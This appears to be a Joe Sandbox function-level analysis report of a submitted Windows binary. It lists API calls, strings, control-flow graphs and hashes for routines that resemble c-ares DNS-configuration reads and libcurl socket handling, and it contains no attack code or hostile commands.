                                                                • Opcode ID: 65308eb213bc4ba22ac3700cc95ffb5b7b4b0b9d7e84e98195cc0471aec748d6
                                                                • Instruction ID: 5c7a81357dc6f2cfe6808ed4092a6e598cfb8dce257f100d909912040380c097
                                                                • Opcode Fuzzy Hash: 65308eb213bc4ba22ac3700cc95ffb5b7b4b0b9d7e84e98195cc0471aec748d6
                                                                • Instruction Fuzzy Hash: 38F06D75108308AFD2109E01DC48DABBBEDEFC9758F05495DF948132118270AE10CAB6
                                                                Function 0093A440 Relevance: 50.1, APIs: 20, Strings: 8, Instructions: 1066registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0093A499
                                                                • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0093A4FB
                                                                • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0093A531
                                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0093AA19
                                                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0093AA4C
                                                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0093AA97
                                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0093AAE9
                                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0093AB30
                                                                • RegCloseKey.KERNELBASE(?), ref: 0093AB6A
                                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0093AB82
                                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0093AC46
                                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0093AD0A
                                                                • RegEnumKeyExA.KERNELBASE ref: 0093AD8D
                                                                • RegCloseKey.KERNELBASE(?), ref: 0093ADD9
                                                                • RegEnumKeyExA.KERNELBASE ref: 0093AE08
                                                                • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0093AE2A
                                                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0093AE54
                                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0093AF63
                                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0093AFB2
                                                                • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0093B072
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                                                • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                                • API String ID: 4281207131-1047472027
                                                                • Opcode ID: d962b193d76e06af956f2c8a39897f201faca7a03f05e1a19f8285e73c59a6f9
                                                                • Instruction ID: eb9af784358dd89ea556f66133ff27b94d949e9d6e3fbf2a9412754016c3083b
                                                                • Opcode Fuzzy Hash: d962b193d76e06af956f2c8a39897f201faca7a03f05e1a19f8285e73c59a6f9
                                                                • Instruction Fuzzy Hash: A4727FB1608301AFE710DB24CC82F6BB7E8AF85740F145829F985E72A1E775E948CB53
                                                                Function 008BA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 008BA831
                                                                Strings
                                                                • @, xrefs: 008BA8F4
                                                                • @, xrefs: 008BAC42
                                                                • cf_socket_open() -> %d, fd=%d, xrefs: 008BA796
                                                                • Couldn't bind to '%s' with errno %d: %s, xrefs: 008BAE1F
                                                                • Local Interface %s is ip %s using address family %i, xrefs: 008BAE60
                                                                • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 008BAD0A
                                                                • Local port: %hu, xrefs: 008BAF28
                                                                • bind failed with errno %d: %s, xrefs: 008BB080
                                                                • Name '%s' family %i resolved to '%s' family %i, xrefs: 008BADAC
                                                                • cf-socket.c, xrefs: 008BA5CD, 008BA735
                                                                • Trying %s:%d..., xrefs: 008BA7C2, 008BA7DE
                                                                • Trying [%s]:%d..., xrefs: 008BA689
                                                                • Bind to local port %d failed, trying next, xrefs: 008BAFE5
                                                                • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 008BA6CE
                                                                • Could not set TCP_NODELAY: %s, xrefs: 008BA871
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: setsockopt
                                                                • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                                • API String ID: 3981526788-2373386790
                                                                • Opcode ID: dd1863b238c23af065cb41193af6db1a57c772e183a3215130e9e0de81661f00
                                                                • Instruction ID: b8cfe4cc217c899c3118d1b51838de071ad250f96dc1ffc109626f811a92a0da
                                                                • Opcode Fuzzy Hash: dd1863b238c23af065cb41193af6db1a57c772e183a3215130e9e0de81661f00
                                                                • Instruction Fuzzy Hash: ED62D071508381ABE7258F24C846BEBB7E4FF91314F084929F99897392E771E845CB93
                                                                Function 00949740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 855 949740-94975b 856 949780-949782 855->856 857 94975d-949768 call 9478a0 855->857 858 949914-94994e call c08b70 RegOpenKeyExA 856->858 859 949788-9497a0 call c08e00 call 9478a0 856->859 866 94976e-949770 857->866 867 9499bb-9499c0 857->867 870 949950-949955 858->870 871 94995a-949992 RegQueryValueExA RegCloseKey call c08b98 858->871 859->867 872 9497a6-9497c5 859->872 866->872 873 949772-94977e 866->873 868 949a0c-949a15 867->868 870->868 885 949997-9499b5 call 9478a0 871->885 878 949827-949833 872->878 879 9497c7-9497e0 872->879 873->859 881 949835-94985c call 93e2b0 * 2 878->881 882 94985f-949872 call 945ca0 878->882 883 9497f6-949809 879->883 884 9497e2-9497f3 call c08b50 879->884 881->882 894 9499f0 882->894 895 949878-94987d call 9477b0 882->895 883->878 897 94980b-949810 883->897 884->883 885->867 885->872 901 9499f5-9499fb call 945d00 894->901 902 949882-949889 895->902 897->878 898 949812-949822 897->898 898->868 910 9499fe-949a09 901->910 902->901 906 94988f-94989b call 934fe0 902->906 906->894 914 9498a1-9498c3 call c08b50 call 9478a0 906->914 910->868 919 9499c2-9499ed call 93e2b0 * 2 914->919 920 9498c9-9498db call 93e2d0 914->920 919->894 920->919 925 9498e1-9498f0 call 93e2d0 920->925 925->919 930 9498f6-949905 call 9463f0 925->930 935 949f66-949f7f call 945d00 930->935 936 94990b-94990f 930->936 935->910 938 949a3f-949a5a call 946740 call 9463f0 936->938 938->935 944 949a60-949a6e call 946d60 938->944 947 949a70-949a94 call 946200 call 9467e0 call 946320 944->947 948 949a1f-949a39 call 946840 call 9463f0 944->948 959 949a16-949a19 947->959 960 949a96-949ac6 call 93d120 947->960 948->935 948->938 959->948 961 949fc1 959->961 966 949ae1-949af7 call 93d190 960->966 967 949ac8-949adb call 93d120 960->967 963 949fc5-949ffd call 945d00 call 93e2b0 * 2 961->963 963->910 966->948 973 949afd-949b09 call 934fe0 966->973 967->948 967->966 973->961 979 949b0f-949b29 call 93e730 973->979 984 949f84-949f88 979->984 985 949b2f-949b3a call 9478a0 979->985 987 949f95-949f99 984->987 985->984 992 949b40-949b54 call 93e760 985->992 989 949fa0-949fb6 call 93ebf0 * 2 987->989 990 949f9b-949f9e 987->990 1002 949fb7-949fbe 989->1002 990->961 990->989 998 949f8a-949f92 992->998 999 949b5a-949b6e call 93e730 992->999 998->987 1006 949b70-94a004 999->1006 1007 949b8c-949b97 call 9463f0 999->1007 1002->961 1011 94a015-94a01d 1006->1011 1014 949b9d-949bbf call 946740 call 9463f0 1007->1014 1015 949c9a-949cab call 93ea00 1007->1015 1012 94a024-94a045 call 93ebf0 * 2 1011->1012 1013 94a01f-94a022 1011->1013 1012->963 1013->963 1013->1012 1014->1015 1033 949bc5-949bda call 946d60 1014->1033 1024 949f31-949f35 1015->1024 1025 949cb1-949ccd call 93ea00 call 93e960 1015->1025 1028 949f37-949f3a 1024->1028 1029 949f40-949f61 call 93ebf0 * 2 1024->1029 1041 949cfd-949d0e call 93e960 1025->1041 1042 949ccf 1025->1042 1028->948 1028->1029 1029->948 1033->1015 1044 949be0-949bf4 call 946200 call 9467e0 1033->1044 1052 949d10 1041->1052 1053 949d53-949d55 1041->1053 1045 949cd1-949cec call 93e9f0 call 93e4a0 1042->1045 1044->1015 1061 949bfa-949c0b call 946320 1044->1061 1066 949d47-949d51 1045->1066 1067 949cee-949cfb call 93e9d0 1045->1067 1056 949d12-949d2d call 93e9f0 call 93e4a0 1052->1056 1059 949e69-949e8e call 93ea40 call 93e440 1053->1059 1084 949d2f-949d3c call 93e9d0 1056->1084 1085 949d5a-949d6f call 93e960 1056->1085 1080 949e94-949eaa call 93e3c0 1059->1080 1081 949e90-949e92 1059->1081 1076 949b75-949b86 call 93ea00 1061->1076 1077 949c11-949c1c call 947b70 1061->1077 1071 949dca-949ddb call 93e960 1066->1071 1067->1041 1067->1045 1089 949ddd-949ddf 1071->1089 1090 949e2e-949e36 1071->1090 1076->1007 1099 949f2d 1076->1099 1077->1007 1102 949c22-949c33 call 93e960 1077->1102 1106 949eb0-949eb1 1080->1106 1107 94a04a-94a04c 1080->1107 1087 949eb3-949ec4 call 93e9c0 1081->1087 1084->1056 1109 949d3e-949d42 1084->1109 1112 949d71-949d73 1085->1112 1113 949dc2 1085->1113 1087->948 1116 949eca-949ed0 1087->1116 1098 949e06-949e21 call 93e9f0 call 93e4a0 1089->1098 1095 949e3d-949e5b call 93ebf0 * 2 1090->1095 1096 949e38-949e3b 1090->1096 1104 949e5e-949e67 1095->1104 1096->1095 1096->1104 1139 949de1-949dee call 93ec80 1098->1139 1140 949e23-949e2c call 93eac0 1098->1140 1099->1024 1125 949c35 1102->1125 1126 949c66-949c75 call 9478a0 1102->1126 1104->1059 1104->1087 1106->1087 1119 94a057-94a070 call 93ebf0 * 2 1107->1119 1120 94a04e-94a051 1107->1120 1109->1059 1114 949d9a-949db5 call 93e9f0 call 93e4a0 1112->1114 1113->1071 1155 949d75-949d82 call 93ec80 1114->1155 1156 949db7-949dc0 call 93eac0 1114->1156 1123 949ee5-949ef2 call 93e9f0 1116->1123 1119->1002 1120->961 1120->1119 1123->948 1148 949ef8-949f0e call 93e440 1123->1148 1133 949c37-949c51 call 93e9f0 1125->1133 1144 94a011 1126->1144 1145 949c7b-949c8f call 93e7c0 1126->1145 1133->1007 1165 949c57-949c64 call 93e9d0 1133->1165 1158 949df1-949e04 call 93e960 1139->1158 1140->1158 1144->1011 1145->1007 1168 949c95-94a00e 1145->1168 1163 949f10-949f26 call 93e3c0 1148->1163 1164 949ed2-949edf call 93e9e0 1148->1164 1172 949d85-949d98 call 93e960 1155->1172 1156->1172 1158->1090 1158->1098 1163->1164 1181 949f28 1163->1181 1164->948 1164->1123 1165->1126 1165->1133 1168->1144 1172->1113 1172->1114 1181->961
                                                                APIs
                                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00949946
                                                                • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00949974
                                                                • RegCloseKey.KERNELBASE(?), ref: 0094998B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                                • API String ID: 3677997916-4129964100
                                                                • Opcode ID: 6fa2705d9c41a23d33ea60536daa5e14116eb5eab9b41fe90413232ecfae635d
                                                                • Instruction ID: 13798060ee61c260f8d884b2ac613bb0c540a50b3115835387b8dca75473f894
                                                                • Opcode Fuzzy Hash: 6fa2705d9c41a23d33ea60536daa5e14116eb5eab9b41fe90413232ecfae635d
                                                                • Instruction Fuzzy Hash: 6C3298B59042016BEB11AB25EC42F1B76E8AF95318F084838FD4D962A3F731ED19DB53
                                                                Function 008B8B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1299 8b8b50-8b8b69 1300 8b8b6b-8b8b74 1299->1300 1301 8b8be6 1299->1301 1303 8b8beb-8b8bf2 1300->1303 1304 8b8b76-8b8b8d 1300->1304 1302 8b8be9 1301->1302 1302->1303 1305 8b8b8f-8b8ba7 call 896e40 1304->1305 1306 8b8bf3-8b8bfe call 8ba550 1304->1306 1313 8b8cd9-8b8d16 SleepEx getsockopt 1305->1313 1314 8b8bad-8b8baf 1305->1314 1311 8b8de4-8b8def 1306->1311 1312 8b8c04-8b8c08 1306->1312 1317 8b8e8c-8b8e95 1311->1317 1318 8b8df5-8b8e19 call 8ba150 1311->1318 1319 8b8c0e-8b8c1d 1312->1319 1320 8b8dbd-8b8dc3 1312->1320 1315 8b8d18-8b8d20 1313->1315 1316 8b8d22 1313->1316 1321 8b8ca6-8b8cb0 1314->1321 1322 8b8bb5-8b8bb9 1314->1322 1323 8b8d26-8b8d39 1315->1323 1316->1323 1324 8b8f00-8b8f06 1317->1324 1325 8b8e97-8b8e9c 1317->1325 1358 8b8e1b-8b8e26 1318->1358 1359 8b8e88 1318->1359 1327 8b8c1f-8b8c30 connect 1319->1327 1328 8b8c35-8b8c48 call 8ba150 1319->1328 1320->1302 1321->1313 1329 8b8cb2-8b8cb8 1321->1329 1322->1303 1330 8b8bbb-8b8bc2 1322->1330 1332 8b8d3b-8b8d3d 1323->1332 1333 8b8d43-8b8d61 call 89d8c0 call 8ba150 1323->1333 1324->1303 1334 8b8edf-8b8eef call 8878b0 1325->1334 1335 8b8e9e-8b8eb6 call 892a00 1325->1335 1327->1328 1360 8b8c4d-8b8c4f 1328->1360 1337 8b8cbe-8b8cd4 call 8bb180 1329->1337 1338 8b8ddc-8b8dde 1329->1338 1330->1303 1339 8b8bc4-8b8bcc 1330->1339 1332->1333 1332->1338 1364 8b8d66-8b8d74 1333->1364 1355 8b8ef2-8b8efc 1334->1355 1335->1334 1357 8b8eb8-8b8edd call 893410 * 2 1335->1357 1337->1311 1338->1302 1338->1311 1345 8b8bce-8b8bd2 1339->1345 1346 8b8bd4-8b8bda 1339->1346 1345->1303 1345->1346 1346->1303 1347 8b8bdc-8b8be1 1346->1347 1354 8b8dac-8b8db8 call 8c50a0 1347->1354 1354->1303 1355->1324 1357->1355 1366 8b8e28-8b8e2c 1358->1366 1367 8b8e2e-8b8e85 call 89d090 call 8c4fd0 1358->1367 1359->1317 1361 8b8c8e-8b8c93 1360->1361 1362 8b8c51-8b8c58 1360->1362 1371 8b8c99-8b8c9f 1361->1371 1372 8b8dc8-8b8dd9 call 8bb100 1361->1372 1362->1361 1368 8b8c5a-8b8c62 1362->1368 1364->1303 1373 8b8d7a-8b8d81 1364->1373 1366->1359 1366->1367 1367->1359 1375 8b8c6a-8b8c70 1368->1375 1376 8b8c64-8b8c68 1368->1376 1371->1321 1372->1338 1373->1303 1379 8b8d87-8b8d8f 1373->1379 1375->1361 1381 8b8c72-8b8c8b call 8c50a0 1375->1381 1376->1361 1376->1375 1383 8b8d9b-8b8da1 1379->1383 1384 8b8d91-8b8d95 1379->1384 1381->1361 1383->1303 1389 8b8da7 1383->1389 1384->1303 1384->1383 1389->1354
                                                                APIs
                                                                • connect.WS2_32(?,?,00000001), ref: 008B8C30
                                                                • SleepEx.KERNELBASE(00000000,00000000), ref: 008B8CF3
                                                                • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 008B8D0E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: Sleepconnectgetsockopt
                                                                • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                                • API String ID: 1669343778-879669977
                                                                • Opcode ID: fbff6ae28b158d6a0b8865170c6f1275b3f625f74515cf647c38e03268ee57eb
                                                                • Instruction ID: 30f16ded3667f688c5ba1c76178b3e1f543df8c3d2c96f86099102e1690e27b7
                                                                • Opcode Fuzzy Hash: fbff6ae28b158d6a0b8865170c6f1275b3f625f74515cf647c38e03268ee57eb
                                                                • Instruction Fuzzy Hash: 81B1A070604705EFDB20CF24C985BA67BA8FF55324F188929E8698B392DB71E844C762
                                                                Function 00882F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144registryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1485 882f17-882f8c call cbf570 call cbf960 1490 8831c9-8831cd 1485->1490 1491 882f91-882ff4 call 881619 RegOpenKeyExA 1490->1491 1492 8831d3-8831d6 1490->1492 1495 882ffa-88300b 1491->1495 1496 8831c5 1491->1496 1497 88315c-8831ac RegEnumKeyExA 1495->1497 1496->1490 1498 883010-883083 call 881619 RegOpenKeyExA 1497->1498 1499 8831b2-8831c2 RegCloseKey 1497->1499 1502 883089-8830d4 RegQueryValueExA 1498->1502 1503 88314e-883152 1498->1503 1499->1496 1504 88313b-88314b RegCloseKey 1502->1504 1505 8830d6-883137 call cbf840 call cbf8d0 call cbf960 call cbf770 call cbf960 call cbdce0 1502->1505 1503->1497 1504->1503 1505->1504
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: CloseEnumOpen
                                                                • String ID: d
                                                                • API String ID: 1332880857-2564639436
                                                                • Opcode ID: dc8162a8a97090fe9862ab6c58a467f4e11490e74919117c508e5b3a129a12e9
                                                                • Instruction ID: 78455ca68c0a90e1faf4c0fb9232488711f529cec6e9ceed76a41b52b7c9bc2b
                                                                • Opcode Fuzzy Hash: dc8162a8a97090fe9862ab6c58a467f4e11490e74919117c508e5b3a129a12e9
                                                                • Instruction Fuzzy Hash: 4171B4B49043099FDB10EF69C98579EBBF0FF84318F10886DE498A7311D7749A898F52
                                                                Function 008B9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1518 8b9290-8b92ed call 8876a0 1521 8b93c3-8b93ce 1518->1521 1522 8b92f3-8b92fb 1518->1522 1529 8b93d0-8b93e1 1521->1529 1530 8b93e5-8b9427 call 89d090 call 8c4f40 1521->1530 1523 8b93aa-8b93af 1522->1523 1524 8b9301-8b9333 call 89d8c0 call 89d9a0 1522->1524 1527 8b9456-8b9470 1523->1527 1528 8b93b5-8b93bc 1523->1528 1542 8b93a7 1524->1542 1543 8b9335-8b9364 WSAIoctl 1524->1543 1532 8b9429-8b9431 1528->1532 1533 8b93be 1528->1533 1529->1528 1534 8b93e3 1529->1534 1530->1527 1530->1532 1537 8b9439-8b943f 1532->1537 1538 8b9433-8b9437 1532->1538 1533->1527 1534->1527 1537->1527 1541 8b9441-8b9453 call 8c50a0 1537->1541 1538->1527 1538->1537 1541->1527 1542->1523 1546 8b939b-8b93a4 1543->1546 1547 8b9366-8b936f 1543->1547 1546->1542 1547->1546 1550 8b9371-8b9390 setsockopt 1547->1550 1550->1546 1551 8b9392-8b9395 1550->1551 1551->1546
                                                                APIs
